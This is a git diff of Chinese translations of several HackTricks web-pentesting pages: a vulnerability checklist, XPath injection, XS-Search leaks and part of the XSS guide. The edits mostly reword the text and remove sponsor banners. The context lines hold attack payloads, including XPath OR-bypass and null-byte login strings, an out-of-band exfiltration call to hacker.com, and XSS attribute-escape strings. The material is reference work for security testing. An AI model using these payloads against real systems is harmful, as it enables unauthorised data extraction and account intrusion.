-- [ ] [**悬挂标记**](dangling-markup-html-scriptless-injection/)
-- [ ] [**文件包含/路径遍历**](file-inclusion/)
-- [ ] [**开放重定向**](open-redirect.md)
-- [ ] [**原型污染到XSS**](deserialization/nodejs-proto-prototype-pollution/#client-side-prototype-pollution-to-xss)
-- [ ] [**服务器端包含/边缘端包含**](server-side-inclusion-edge-side-inclusion-injection.md)
-- [ ] [**服务器端请求伪造**](ssrf-server-side-request-forgery/)
-- [ ] [**服务器端模板注入**](ssti-server-side-template-injection/)
-- [ ] [**反向标签窃取**](reverse-tab-nabbing.md)
-- [ ] [**XSLT服务器端注入**](xslt-server-side-injection-extensible-stylesheet-language-transformations.md)
+- [ ] [**Dangling Markup**](dangling-markup-html-scriptless-injection/)
+- [ ] [**File Inclusion/Path Traversal**](file-inclusion/)
+- [ ] [**Open Redirect**](open-redirect.md)
+- [ ] [**Prototype Pollution to XSS**](deserialization/nodejs-proto-prototype-pollution/#client-side-prototype-pollution-to-xss)
+- [ ] [**Server Side Inclusion/Edge Side Inclusion**](server-side-inclusion-edge-side-inclusion-injection.md)
+- [ ] [**Server Side Request Forgery**](ssrf-server-side-request-forgery/)
+- [ ] [**Server Side Template Injection**](ssti-server-side-template-injection/)
+- [ ] [**Reverse Tab Nabbing**](reverse-tab-nabbing.md)
+- [ ] [**XSLT Server Side Injection**](xslt-server-side-injection-extensible-stylesheet-language-transformations.md)
 - [ ] [**XSS**](xss-cross-site-scripting/)
 - [ ] [**XSSI**](xssi-cross-site-script-inclusion.md)
-- [ ] [**XS-搜索**](xs-search/)
+- [ ] [**XS-Search**](xs-search/)
 
-一些提到的漏洞需要特殊条件,其他的只需要内容被反射。您可以找到一些有趣的多语言工具来快速测试漏洞:
+一些提到的漏洞需要特殊条件,其他的只需要内容被反映。您可以找到一些有趣的多语言工具来快速测试漏洞:
 
 {{#ref}}
 pocs-and-polygloths-cheatsheet/
 {{#endref}}
 
-### **搜索功能**
+### **Search functionalities**
 
 如果该功能可用于在后端搜索某种数据,您可能可以(滥)用它来搜索任意数据。
 
-- [ ] [**文件包含/路径遍历**](file-inclusion/)
-- [ ] [**NoSQL注入**](nosql-injection.md)
-- [ ] [**LDAP注入**](ldap-injection.md)
+- [ ] [**File Inclusion/Path Traversal**](file-inclusion/)
+- [ ] [**NoSQL Injection**](nosql-injection.md)
+- [ ] [**LDAP Injection**](ldap-injection.md)
 - [ ] [**ReDoS**](regular-expression-denial-of-service-redos.md)
-- [ ] [**SQL注入**](sql-injection/)
-- [ ] [**XPATH注入**](xpath-injection.md)
+- [ ] [**SQL Injection**](sql-injection/)
+- [ ] [**XPATH Injection**](xpath-injection.md)
 
-### **表单、WebSockets和PostMsgs**
+### **Forms, WebSockets and PostMsgs**
 
-当WebSocket发送消息或表单允许用户执行操作时,可能会出现漏洞。
+当 WebSocket 发布消息或表单允许用户执行操作时,可能会出现漏洞。
 
-- [ ] [**跨站请求伪造**](csrf-cross-site-request-forgery.md)
-- [ ] [**跨站WebSocket劫持(CSWSH)**](websocket-attacks.md)
-- [ ] [**PostMessage漏洞**](postmessage-vulnerabilities/)
+- [ ] [**Cross Site Request Forgery**](csrf-cross-site-request-forgery.md)
+- [ ] [**Cross-site WebSocket hijacking (CSWSH)**](websocket-attacks.md)
+- [ ] [**PostMessage Vulnerabilities**](postmessage-vulnerabilities/)
 
-### **HTTP头**
+### **HTTP Headers**
 
-根据Web服务器提供的HTTP头,可能存在某些漏洞。
+根据 Web 服务器提供的 HTTP 头,可能存在某些漏洞。
 
-- [ ] [**点击劫持**](clickjacking.md)
-- [ ] [**内容安全策略绕过**](content-security-policy-csp-bypass/)
-- [ ] [**Cookies攻击**](hacking-with-cookies/)
-- [ ] [**CORS - 错误配置与绕过**](cors-bypass.md)
+- [ ] [**Clickjacking**](clickjacking.md)
+- [ ] [**Content Security Policy bypass**](content-security-policy-csp-bypass/)
+- [ ] [**Cookies Hacking**](hacking-with-cookies/)
+- [ ] [**CORS - Misconfigurations & Bypass**](cors-bypass.md)
 
-### **绕过**
+### **Bypasses**
 
-有几个特定功能可能需要一些变通方法来绕过它们
+有几个特定功能可能需要一些变通方法来绕过它们。
 
-- [ ] [**2FA/OTP绕过**](2fa-bypass.md)
-- [ ] [**绕过支付流程**](bypass-payment-process.md)
-- [ ] [**验证码绕过**](captcha-bypass.md)
-- [ ] [**登录绕过**](login-bypass/)
-- [ ] [**竞争条件**](race-condition.md)
-- [ ] [**速率限制绕过**](rate-limit-bypass.md)
-- [ ] [**重置忘记密码绕过**](reset-password.md)
-- [ ] [**注册漏洞**](registration-vulnerabilities.md)
+- [ ] [**2FA/OTP Bypass**](2fa-bypass.md)
+- [ ] [**Bypass Payment Process**](bypass-payment-process.md)
+- [ ] [**Captcha Bypass**](captcha-bypass.md)
+- [ ] [**Login Bypass**](login-bypass/)
+- [ ] [**Race Condition**](race-condition.md)
+- [ ] [**Rate Limit Bypass**](rate-limit-bypass.md)
+- [ ] [**Reset Forgotten Password Bypass**](reset-password.md)
+- [ ] [**Registration Vulnerabilities**](registration-vulnerabilities.md)
 
-### **结构化对象/特定功能**
+### **Structured objects / Specific functionalities**
 
-某些功能将要求**数据以非常特定的格式进行结构化**(如语言序列化对象或XML)。因此,更容易识别应用程序是否可能存在漏洞,因为它需要处理这种类型的数据。\
-某些**特定功能**也可能存在漏洞,如果使用**特定格式的输入**(如电子邮件头注入)。
+某些功能将要求 **数据以非常特定的格式进行结构化**(如语言序列化对象或 XML)。因此,更容易识别应用程序是否可能存在漏洞,因为它需要处理这种类型的数据。\
+某些 **特定功能** 也可能存在漏洞,如果使用 **特定格式的输入**(如电子邮件头注入)。
 
-- [ ] [**反序列化**](deserialization/)
-- [ ] [**电子邮件头注入**](email-injections.md)
-- [ ] [**JWT漏洞**](hacking-jwt-json-web-tokens.md)
-- [ ] [**XML外部实体**](xxe-xee-xml-external-entity.md)
+- [ ] [**Deserialization**](deserialization/)
+- [ ] [**Email Header Injection**](email-injections.md)
+- [ ] [**JWT Vulnerabilities**](hacking-jwt-json-web-tokens.md)
+- [ ] [**XML External Entity**](xxe-xee-xml-external-entity.md)
 
-### 文件
+### Files
 
-允许上传文件的功能可能会受到多种问题的影响。\
+允许上传文件的功能可能会存在多种问题。\
 生成包含用户输入的文件的功能可能会执行意外代码。\
 打开用户上传的文件或自动生成的包含用户输入的文件的用户可能会受到威胁。
 
-- [ ] [**文件上传**](file-upload/)
-- [ ] [**公式注入**](formula-csv-doc-latex-ghostscript-injection.md)
-- [ ] [**PDF注入**](xss-cross-site-scripting/pdf-injection.md)
-- [ ] [**服务器端XSS**](xss-cross-site-scripting/server-side-xss-dynamic-pdf.md)
+- [ ] [**File Upload**](file-upload/)
+- [ ] [**Formula Injection**](formula-csv-doc-latex-ghostscript-injection.md)
+- [ ] [**PDF Injection**](xss-cross-site-scripting/pdf-injection.md)
+- [ ] [**Server Side XSS**](xss-cross-site-scripting/server-side-xss-dynamic-pdf.md)
 
-### **外部身份管理**
+### **External Identity Management**
 
-- [ ] [**OAUTH到账户接管**](oauth-to-account-takeover.md)
-- [ ] [**SAML攻击**](saml-attacks/)
+- [ ] [**OAUTH to Account takeover**](oauth-to-account-takeover.md)
+- [ ] [**SAML Attacks**](saml-attacks/)
 
-### **其他有用的漏洞**
+### **Other Helpful Vulnerabilities**
 
 这些漏洞可能有助于利用其他漏洞。
 
-- [ ] [**域/子域接管**](domain-subdomain-takeover.md)
+- [ ] [**Domain/Subdomain takeover**](domain-subdomain-takeover.md)
 - [ ] [**IDOR**](idor.md)
-- [ ] [**参数污染**](parameter-pollution.md)
-- [ ] [**Unicode规范化漏洞**](unicode-injection/)
-
-

-
-**从黑客的角度看待您的网络应用、网络和云**
-
-**发现并报告具有实际商业影响的关键可利用漏洞。** 使用我们20多个自定义工具来映射攻击面,查找允许您提升权限的安全问题,并使用自动化利用收集重要证据,将您的辛勤工作转化为有说服力的报告。
-
-{% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %}
+- [ ] [**Parameter Pollution**](parameter-pollution.md)
+- [ ] [**Unicode Normalization vulnerability**](unicode-injection/)
 
 {{#include ../banners/hacktricks-training.md}}
diff --git a/src/pentesting-web/xpath-injection.md b/src/pentesting-web/xpath-injection.md
index e667a43e5..be08033fa 100644
--- a/src/pentesting-web/xpath-injection.md
+++ b/src/pentesting-web/xpath-injection.md
@@ -2,26 +2,11 @@
 
 {{#include ../banners/hacktricks-training.md}}
 
-

-
-加入 [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) 服务器,与经验丰富的黑客和漏洞赏金猎人交流!
-
-**黑客洞察**\
-参与深入探讨黑客的刺激与挑战的内容
-
-**实时黑客新闻**\
-通过实时新闻和见解,跟上快速变化的黑客世界
-
-**最新公告**\
-了解最新的漏洞赏金计划和重要平台更新
-
-**加入我们** [**Discord**](https://discord.com/invite/N3FrSbmwdy),今天就开始与顶级黑客合作吧!
-
 ## 基本语法
 
 一种称为 XPath 注入 的攻击技术被用来利用基于用户输入形成 XPath(XML 路径语言)查询的应用程序,以查询或导航 XML 文档。
 
-### 节点描述
+### 描述的节点
 
 表达式用于选择 XML 文档中的各种节点。以下是这些表达式及其描述的总结:
 
@@ -40,21 +25,21 @@
 - **/bookstore**: 选择根元素 bookstore。注意,以斜杠(/)开头的路径表示对元素的绝对路径。
 - **bookstore/book**: 选择所有 bookstore 的子元素 book。
 - **//book**: 选择文档中的所有 book 元素,无论它们的位置。
-- **bookstore//book**: 选择 bookstore 元素的所有后代 book 元素,无论它们在 bookstore 元素下的位置。
+- **bookstore//book**: 选择所有 bookstore 元素的后代 book 元素,无论它们在 bookstore 元素下的位置。
 - **//@lang**: 选择所有名为 lang 的属性。
 
-### 谓词的使用
+### 使用谓词
 
 谓词用于细化选择:
 
-- **/bookstore/book\[1]**: 选择 bookstore 元素的第一个子元素 book。对于 IE 版本 5 到 9,索引第一个节点为 \[0] 的解决方法是通过 JavaScript 将 SelectionLanguage 设置为 XPath。
-- **/bookstore/book\[last()]**: 选择 bookstore 元素的最后一个子元素 book。
-- **/bookstore/book\[last()-1]**: 选择 bookstore 元素的倒数第二个子元素 book。
-- **/bookstore/book\[position()<3]**: 选择 bookstore 元素的前两个子元素 book。
+- **/bookstore/book\[1]**: 选择 bookstore 元素的第一个 book 元素子元素。对于 IE 版本 5 到 9 的变通方法是通过 JavaScript 将 SelectionLanguage 设置为 XPath,因为它将第一个节点索引为 \[0]。
+- **/bookstore/book\[last()]**: 选择 bookstore 元素的最后一个 book 元素子元素。
+- **/bookstore/book\[last()-1]**: 选择 bookstore 元素的倒数第二个 book 元素子元素。
+- **/bookstore/book\[position()<3]**: 选择 bookstore 元素的前两个 book 元素子元素。
 - **//title\[@lang]**: 选择所有具有 lang 属性的 title 元素。
-- **//title\[@lang='en']**: 选择所有 lang 属性值为 "en" 的 title 元素。
+- **//title\[@lang='en']**: 选择所有 "lang" 属性值为 "en" 的 title 元素。
 - **/bookstore/book\[price>35.00]**: 选择价格大于 35.00 的 bookstore 的所有 book 元素。
-- **/bookstore/book\[price>35.00]/title**: 选择价格大于 35.00 的 bookstore 的所有 book 元素的 title 元素。
+- **/bookstore/book\[price>35.00]/title**: 选择价格大于 35.00 的 bookstore 的 book 元素的所有 title 元素。
 
 ### 处理未知节点
 
@@ -68,7 +53,7 @@
 
 - **/bookstore/\***: 选择 bookstore 元素的所有子元素节点。
 - **//\***: 选择文档中的所有元素。
-- **//title\[@\*]**: 选择所有至少具有一个任意类型属性的 title 元素。
+- **//title\[@\*]**: 选择所有具有至少一个任意类型属性的 title 元素。
 
 ## 示例
 ```xml
@@ -160,7 +145,7 @@ doc-available(concat("http://hacker.com/oob/", name(/*[1]/*[1]), name(/*[1]/*[1]
 string(//user[name/text()='+VAR_USER+' and password/text()='+VAR_PASSWD+']/account/text())
 $q = '/usuarios/usuario[cuenta="' . $_POST['user'] . '" and passwd="' . $_POST['passwd'] . '"]';
 ```
-### **OR 绕过用户和密码(两者值相同)**
+### **在用户和密码中绕过 OR(两者值相同)**
 ```
 ' or '1'='1
 " or "1"="1
@@ -171,7 +156,7 @@ string(//user[name/text()='' or '1'='1' and password/text()='' or '1'='1']/accou
 Select account
 Select the account using the username and use one of the previous values in the password field
 ```
-### **滥用空值注入**
+### **滥用空注入**
 ```
 Username: ' or 1]%00
 ```
@@ -281,19 +266,4 @@ doc-available(concat("http://hacker.com/oob/", RESULTS))
 - [https://wiki.owasp.org/index.php/Testing_for_XPath_Injection\_(OTG-INPVAL-010)]()
 - [https://www.w3schools.com/xml/xpath_syntax.asp](https://www.w3schools.com/xml/xpath_syntax.asp)
 
-

-
-加入 [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) 服务器,与经验丰富的黑客和漏洞赏金猎人交流!
-
-**黑客见解**\
-参与深入探讨黑客的刺激与挑战的内容
-
-**实时黑客新闻**\
-通过实时新闻和见解,跟上快速变化的黑客世界
-
-**最新公告**\
-了解最新的漏洞赏金计划和重要平台更新
-
-**加入我们** [**Discord**](https://discord.com/invite/N3FrSbmwdy),今天就开始与顶尖黑客合作吧!
-
 {{#include ../banners/hacktricks-training.md}}
diff --git a/src/pentesting-web/xs-search.md b/src/pentesting-web/xs-search.md
index f8a472951..743b38a40 100644
--- a/src/pentesting-web/xs-search.md
+++ b/src/pentesting-web/xs-search.md
@@ -1,12 +1,5 @@
 # XS-Search/XS-Leaks
 
-

-
-使用 [**Trickest**](https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks) 轻松构建和 **自动化工作流程**,由世界上 **最先进** 的社区工具提供支持。\
-立即获取访问权限:
-
-{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
-
 {{#include ../banners/hacktricks-training.md}}
 
 ## 基本信息
@@ -15,60 +8,52 @@ XS-Search 是一种通过利用 **侧信道漏洞** 来 **提取跨源信息** 
 
 此攻击涉及的关键组件包括:
 
-- **易受攻击的网络**:目标网站,信息旨在从中提取。
-- **攻击者的网络**:攻击者创建的恶意网站,受害者访问,托管漏洞。
-- **包含方法**:将易受攻击的网络纳入攻击者网络所采用的技术(例如,window.open、iframe、fetch、带 href 的 HTML 标签等)。
-- **泄漏技术**:用于根据通过包含方法收集的信息来辨别易受攻击的网络状态差异的技术。
-- **状态**:易受攻击的网络的两种潜在条件,攻击者旨在区分。
-- **可检测差异**:攻击者依赖于可观察的变化来推断易受攻击的网络状态。
+- **易受攻击的网页**:目标网站,信息旨在从中提取。
+- **攻击者的网站**:攻击者创建的恶意网站,受害者访问,托管漏洞。
+- **包含方法**:用于将易受攻击的网页纳入攻击者网站的技术(例如,window.open、iframe、fetch、带 href 的 HTML 标签等)。
+- **泄漏技术**:用于根据通过包含方法收集的信息来辨别易受攻击网页状态差异的技术。
+- **状态**:易受攻击网页的两种潜在条件,攻击者旨在区分。
+- **可检测差异**:攻击者依赖于的可观察变化,以推断易受攻击网页的状态。
 
 ### 可检测差异
 
-可以分析多个方面以区分易受攻击的网络的状态:
+可以分析多个方面以区分易受攻击网页的状态:
 
 - **状态码**:区分 **各种 HTTP 响应状态码** 跨源,如服务器错误、客户端错误或身份验证错误。
-- **API 使用**:识别跨页面的 **Web API 使用情况**,揭示跨源页面是否使用特定的 JavaScript Web API。
+- **API 使用**:识别 **跨页面的 Web API 使用**,揭示跨源页面是否使用特定的 JavaScript Web API。
 - **重定向**:检测导航到不同页面,不仅是 HTTP 重定向,还有由 JavaScript 或 HTML 触发的重定向。
 - **页面内容**:观察 **HTTP 响应体中的变化** 或页面子资源中的变化,例如 **嵌入框的数量** 或图像的大小差异。
 - **HTTP 头**:注意 **特定 HTTP 响应头** 的存在或可能的值,包括 X-Frame-Options、Content-Disposition 和 Cross-Origin-Resource-Policy 等头。
-- **时间**:注意两种状态之间的一致时间差异。
+- **时间**:注意两个状态之间的一致时间差异。
 
 ### 包含方法
 
-- **HTML 元素**:HTML 提供了多种用于 **跨源资源包含** 的元素,如样式表、图像或脚本,迫使浏览器请求非 HTML 资源。可以在 [https://github.com/cure53/HTTPLeaks](https://github.com/cure53/HTTPLeaks) 找到此目的的潜在 HTML 元素的汇编。
-- **框架**:如 **iframe**、**object** 和 **embed** 的元素可以将 HTML 资源直接嵌入攻击者的页面。如果页面 **缺乏框架保护**,JavaScript 可以通过 contentWindow 属性访问框架资源的窗口对象。
-- **弹出窗口**:**`window.open`** 方法在新标签或窗口中打开资源,为 JavaScript 提供 **窗口句柄**,以便与遵循 SOP 的方法和属性进行交互。弹出窗口通常用于单点登录,绕过目标资源的框架和 cookie 限制。然而,现代浏览器将弹出窗口的创建限制为某些用户操作。
+- **HTML 元素**:HTML 提供多种元素用于 **跨源资源包含**,如样式表、图像或脚本,迫使浏览器请求非 HTML 资源。可以在 [https://github.com/cure53/HTTPLeaks](https://github.com/cure53/HTTPLeaks) 找到潜在 HTML 元素的汇编。
+- **框架**:如 **iframe**、**object** 和 **embed** 的元素可以将 HTML 资源直接嵌入攻击者页面。如果页面 **缺乏框架保护**,JavaScript 可以通过 contentWindow 属性访问框架资源的窗口对象。
+- **弹出窗口**:**`window.open`** 方法在新标签或窗口中打开资源,为 JavaScript 提供 **窗口句柄**,以便与遵循 SOP 的方法和属性进行交互。弹出窗口通常用于单点登录,绕过目标资源的框架和 cookie 限制。然而,现代浏览器限制弹出窗口的创建,仅限于某些用户操作。
 - **JavaScript 请求**:JavaScript 允许使用 **XMLHttpRequests** 或 **Fetch API** 直接请求目标资源。这些方法提供对请求的精确控制,例如选择跟随 HTTP 重定向。
 
 ### 泄漏技术
 
-- **事件处理程序**:XS-Leaks 中的一种经典泄漏技术,其中事件处理程序如 **onload** 和 **onerror** 提供有关资源加载成功或失败的见解。
+- **事件处理程序**:XS-Leaks 中的一种经典泄漏技术,事件处理程序如 **onload** 和 **onerror** 提供有关资源加载成功或失败的见解。
 - **错误消息**:JavaScript 异常或特殊错误页面可以直接从错误消息中提供泄漏信息,或通过区分其存在与否来提供信息。
 - **全局限制**:浏览器的物理限制,如内存容量或其他强制的浏览器限制,可以在达到阈值时发出信号,作为泄漏技术。
-- **全局状态**:可检测与浏览器的 **全局状态**(例如,历史接口)的交互可以被利用。例如,浏览器历史中的 **条目数量** 可以提供有关跨源页面的线索。
-- **性能 API**:此 API 提供 **当前页面的性能细节**,包括文档和加载资源的网络时序,从而使对请求资源的推断成为可能。
+- **全局状态**:可检测与浏览器 **全局状态**(例如,历史接口)的交互可以被利用。例如,浏览器历史中的 **条目数量** 可以提供有关跨源页面的线索。
+- **性能 API**:此 API 提供 **当前页面的性能细节**,包括文档和加载资源的网络时序,能够推断请求的资源。
 - **可读属性**:某些 HTML 属性是 **跨源可读** 的,可以用作泄漏技术。例如,`window.frame.length` 属性允许 JavaScript 计算跨源网页中包含的框架数量。
 
 ## XSinator 工具与论文
 
-XSinator 是一个自动化工具,用于 **检查浏览器是否存在多种已知的 XS-Leaks**,在其论文中进行了说明:[**https://xsinator.com/paper.pdf**](https://xsinator.com/paper.pdf)
+XSinator 是一个自动工具,用于 **检查浏览器是否存在多种已知的 XS-Leaks**,详见其论文:[**https://xsinator.com/paper.pdf**](https://xsinator.com/paper.pdf)
 
-您可以在 [**https://xsinator.com/**](https://xsinator.com/) **访问该工具**
+您可以 **访问该工具** [**https://xsinator.com/**](https://xsinator.com/)
 
 > [!WARNING]
-> **排除的 XS-Leaks**:我们不得不排除依赖于 **服务工作者** 的 XS-Leaks,因为它们会干扰 XSinator 中的其他泄漏。此外,我们选择 **排除依赖于特定 Web 应用程序中的错误配置和漏洞的 XS-Leaks**。例如,跨源资源共享(CORS)错误配置、postMessage 泄漏或跨站脚本。此外,我们还排除了基于时间的 XS-Leaks,因为它们通常存在缓慢、嘈杂和不准确的问题。
-
-

-
-\
-使用 [**Trickest**](https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks) 轻松构建和 **自动化工作流程**,由世界上 **最先进** 的社区工具提供支持。\
-立即获取访问权限:
-
-{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
+> **排除的 XS-Leaks**:我们不得不排除依赖 **服务工作者** 的 XS-Leaks,因为它们会干扰 XSinator 中的其他泄漏。此外,我们选择 **排除依赖特定 Web 应用程序中的错误配置和漏洞的 XS-Leaks**。例如,跨源资源共享(CORS)错误配置、postMessage 泄漏或跨站脚本。此外,我们还排除了基于时间的 XS-Leaks,因为它们通常存在缓慢、嘈杂和不准确的问题。
 
 ## **基于时间的技术**
 
-以下一些技术将使用时间作为检测网页可能状态差异过程的一部分。测量时间在网页浏览器中有不同的方法。
+以下一些技术将使用时间作为检测网页可能状态差异的过程的一部分。测量时间在 Web 浏览器中有不同的方法。
 
 **时钟**: [performance.now()](https://developer.mozilla.org/en-US/docs/Web/API/Performance/now) API 允许开发人员获取高分辨率的时间测量。\
 攻击者可以滥用大量 API 来创建隐式时钟:[Broadcast Channel API](https://developer.mozilla.org/en-US/docs/Web/API/Broadcast_Channel_API)、[Message Channel API](https://developer.mozilla.org/en-US/docs/Web/API/MessageChannel)、[requestAnimationFrame](https://developer.mozilla.org/en-US/docs/Web/API/window/requestAnimationFrame)、[setTimeout](https://developer.mozilla.org/en-US/docs/Web/API/WindowOrWorkerGlobalScope/setTimeout)、CSS 动画等。\
@@ -151,14 +136,14 @@ xs-search/performance.now-+-force-heavy-task.md
 
 假设您可以**插入**包含**秘密**内容的**页面****在一个 Iframe** 中。
 
-您可以**让受害者搜索**包含“_**flag**_”的文件,使用**Iframe**(例如,利用 CSRF)。在 Iframe 内,您知道 _**onload 事件**_ 将**至少执行一次**。然后,您可以**更改** **iframe** 的 **URL**,但仅更改 **URL** 中 **hash** 的 **内容**。
+您可以**让受害者搜索**包含“_**flag**_”的文件,使用**Iframe**(例如利用 CSRF)。在 Iframe 内,您知道 _**onload 事件**_ 将**至少执行一次**。然后,您可以**更改** **iframe** 的**URL**,但只更改 URL 中的**hash**内容。
 
 例如:
 
 1. **URL1**: www.attacker.com/xssearch#try1
 2. **URL2**: www.attacker.com/xssearch#try2
 
-如果第一个 URL **成功加载**,那么,当**更改** URL 的 **hash** 部分时,**onload** 事件**不会再次触发**。但是**如果**页面在**加载**时出现某种**错误**,那么,**onload** 事件将**再次触发**。
+如果第一个 URL **成功加载**,那么,当**更改** URL 的**hash**部分时,**onload** 事件**不会再次触发**。但是**如果**页面在**加载**时出现某种**错误**,那么,**onload** 事件将**再次触发**。
 
 然后,您可以**区分**正确加载的页面或访问时出现**错误**的页面。
 
@@ -167,7 +152,7 @@ xs-search/performance.now-+-force-heavy-task.md
 - **Inclusion Methods**: Frames
 - **Detectable Difference**: 页面内容
 - **More info**:
-- **Summary:** 如果**页面**返回**敏感**内容,**或**可以由用户**控制**的**内容**。用户可以在**负面情况下**设置**有效的 JS 代码**,并在每次尝试中加载**``** 标签之间,或者在 `.js` 文件中,或在使用 **`javascript:`** 协议的属性中:
 
-- 如果反映在 **``** 标签之间,即使您的输入在任何类型的引号内,您可以尝试注入 `` 并从此上下文中逃脱。这是有效的,因为 **浏览器会首先解析 HTML 标签** 然后解析内容,因此,它不会注意到您注入的 `` 标签在 HTML 代码中。
+- 如果反映在 **``** 标签之间,即使您的输入在任何类型的引号内,您可以尝试注入 `` 并逃离此上下文。这是有效的,因为 **浏览器会首先解析 HTML 标签** 然后解析内容,因此,它不会注意到您注入的 `` 标签在 HTML 代码内。
 - 如果反映 **在 JS 字符串内**,并且最后一个技巧不起作用,您需要 **退出** 字符串,**执行** 您的代码并 **重构** JS 代码(如果有任何错误,它将不会被执行):
 - `'-alert(1)-'`
 - `';-alert(1)//`
@@ -104,9 +98,9 @@ js-hoisting.md
 
 ![](<../../images/image (711).png>)
 
-如果它是脆弱的,您可以通过发送值**`?callback=alert(1)`**来**触发一个警报**。然而,这些端点通常会**验证内容**,只允许字母、数字、点和下划线(**`[\w\._]`**)。
+如果它是脆弱的,您可能能够**触发一个警报**,只需发送值:**`?callback=alert(1)`**。然而,这些端点通常会**验证内容**,只允许字母、数字、点和下划线(**`[\w\._]`**)。
 
-然而,即使有这个限制,仍然可以执行一些操作。这是因为您可以使用这些有效字符来**访问 DOM 中的任何元素**:
+然而,即使有这个限制,仍然可以执行一些操作。这是因为您可以使用这些有效字符**访问 DOM 中的任何元素**:
 
 ![](<../../images/image (747).png>)
 
@@ -120,7 +114,7 @@ parentElement
 ```
 您还可以尝试直接**触发 Javascript 函数**:`obj.sales.delOrders`。
 
-然而,通常执行指定函数的端点是没有太多有趣 DOM 的端点,**同一源中的其他页面**将具有**更有趣的 DOM**以执行更多操作。
+然而,通常执行所指示函数的端点是没有太多有趣 DOM 的端点,**同一源中的其他页面**将具有**更有趣的 DOM**以执行更多操作。
 
 因此,为了**在不同 DOM 中滥用此漏洞**,开发了**同源方法执行 (SOME)** 利用:
 
@@ -138,7 +132,7 @@ dom-xss.md
 
 ### **通用 XSS**
 
-这种类型的 XSS 可以在**任何地方**找到。它们不仅依赖于对 Web 应用程序的客户端利用,还依赖于**任何****上下文**。这种**任意 JavaScript 执行**甚至可以被滥用以获得**RCE**、**读取****任意****文件**在客户端和服务器上,等等。\
+这种类型的 XSS 可以在**任何地方**找到。它们不仅仅依赖于对 Web 应用程序的客户端利用,而是依赖于**任何****上下文**。这种**任意 JavaScript 执行**甚至可以被滥用以获得**RCE**,**读取**客户端和服务器中的**任意****文件**,等等。\
 一些**示例**:
 
 {{#ref}}
@@ -155,7 +149,7 @@ server-side-xss-dynamic-pdf.md
 
 ## 在原始 HTML 中注入
 
-当您的输入在**HTML 页面**中被反射,或者您可以在此上下文中转义并注入 HTML 代码时,您需要做的**第一**件事是检查您是否可以滥用 `<` 来创建新标签:只需尝试**反射**该**字符**并检查它是否被**HTML 编码**或**删除**,或者是否**未更改地反射**。**只有在最后一种情况下,您才能利用此情况**。\
+当您的输入在**HTML 页面**中被反射时,或者您可以在此上下文中转义并注入 HTML 代码,您需要做的**第一**件事是检查您是否可以滥用 `<` 来创建新标签:只需尝试**反射**该**字符**并检查它是否被**HTML 编码**或**删除**,或者是否**未更改地反射**。**只有在最后一种情况下,您才能利用此情况**。\
 对于这些情况,还**请记住** [**客户端模板注入**](../client-side-template-injection-csti.md)**。**\
 &#xNAN;_**注意:HTML 注释可以使用\*\*\*\*\*\*** \***\*`-->`\*\*** \***\*或 \*\*\*\*\*\***`--!>`\*\**_
 
@@ -168,11 +162,11 @@ alert(1)
 
 ```
 但是,如果使用了标签/属性的黑白名单,您需要**暴力破解可以创建的标签**。\
-一旦您**找到了允许的标签**,您需要**暴力破解**在找到的有效标签内的属性/事件,以查看如何攻击该上下文。
+一旦您**找到了允许的标签**,您需要**暴力破解有效标签内的属性/事件**,以查看如何攻击该上下文。
 
 ### 标签/事件暴力破解
 
-访问 [**https://portswigger.net/web-security/cross-site-scripting/cheat-sheet**](https://portswigger.net/web-security/cross-site-scripting/cheat-sheet),然后点击 _**复制标签到剪贴板**_。然后,使用 Burp intruder 发送所有标签,并检查是否有任何标签未被 WAF 识别为恶意。一旦您发现可以使用的标签,您可以使用有效标签**暴力破解所有事件**(在同一网页上点击 _**复制事件到剪贴板**_,并按照之前的相同程序进行操作)。
+访问 [**https://portswigger.net/web-security/cross-site-scripting/cheat-sheet**](https://portswigger.net/web-security/cross-site-scripting/cheat-sheet),然后点击 _**复制标签到剪贴板**_。然后,使用 Burp intruder 发送所有标签,并检查是否有任何标签未被 WAF 识别为恶意。一旦您发现可以使用的标签,您可以使用有效标签**暴力破解所有事件**(在同一网页上点击 _**复制事件到剪贴板**_,并按照之前的程序进行)。
 
 ### 自定义标签
 
@@ -245,18 +239,18 @@ onerror=alert`1`
 
 ### Click XSS - Clickjacking
 
-如果为了利用这个漏洞,你需要 **用户点击一个链接或一个带有预填充数据的表单**,你可以尝试 [**滥用 Clickjacking**](../clickjacking.md#xss-clickjacking)(如果页面是脆弱的)。
+如果为了利用该漏洞,您需要 **用户点击一个链接或一个带有预填充数据的表单**,您可以尝试 [**滥用 Clickjacking**](../clickjacking.md#xss-clickjacking)(如果页面存在漏洞)。
 
 ### 不可能 - 悬挂标记
 
-如果你认为 **创建一个带有属性以执行 JS 代码的 HTML 标签是不可能的**,你应该检查 [**悬挂标记**](../dangling-markup-html-scriptless-injection/),因为你可以 **利用** 这个漏洞 **而不** 执行 **JS** 代码。
+如果您认为 **创建一个带有属性以执行 JS 代码的 HTML 标签是不可能的**,您应该检查 [**悬挂标记**](../dangling-markup-html-scriptless-injection/),因为您可以 **在不执行** **JS** 代码的情况下 **利用** 该漏洞。
 
 ## 在 HTML 标签内注入
 
 ### 在标签内/从属性值中转义
 
-如果你在 **HTML 标签内**,你可以尝试的第一件事是 **从标签中转义**,并使用 [上一节](./#injecting-inside-raw-html) 中提到的一些技术来执行 JS 代码。\
-如果你 **无法从标签中转义**,你可以在标签内创建新的属性来尝试执行 JS 代码,例如使用一些有效载荷(_注意在这个例子中使用双引号来从属性中转义,如果你的输入直接反映在标签内,你就不需要它们_):
+如果您在 **HTML 标签内**,您可以尝试的第一件事是 **从标签中转义**,并使用 [上一节](./#injecting-inside-raw-html) 中提到的一些技术来执行 JS 代码。\
+如果您 **无法从标签中转义**,您可以在标签内创建新的属性以尝试执行 JS 代码,例如使用一些有效负载(_请注意,在此示例中使用双引号从属性中转义,如果您的输入直接反映在标签内,则不需要它们_):
 ```bash
 " autofocus onfocus=alert(document.domain) x="
 " onfocus=alert(1) id=x tabindex=0 style=display:block>#x #Access http://site.com/?#x t
@@ -273,7 +267,7 @@ onerror=alert`1`
 ```
 ### 在属性内
 
